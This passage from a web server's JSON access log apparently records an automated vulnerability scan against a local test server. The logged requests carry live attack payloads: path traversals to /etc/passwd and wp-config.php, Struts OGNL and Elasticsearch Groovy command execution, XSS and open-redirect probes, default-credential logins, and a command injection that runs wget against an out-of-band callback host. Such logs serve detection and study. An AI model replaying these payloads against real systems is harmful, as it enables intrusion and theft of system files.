HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"29KBxh8aAGGx0HuLbxyDjKcEvsc","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"key=';`wget http://ca28bc0smpvbbtig07h0nn5q1kbt6a3zd.oast.pro`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KBxWsjr7zsIsxFf9iUKTS3XuS.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('29KBxbiY4YDrzCIIqrP1ZxY4GRY')%3elujb7/admin/imgProcess.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 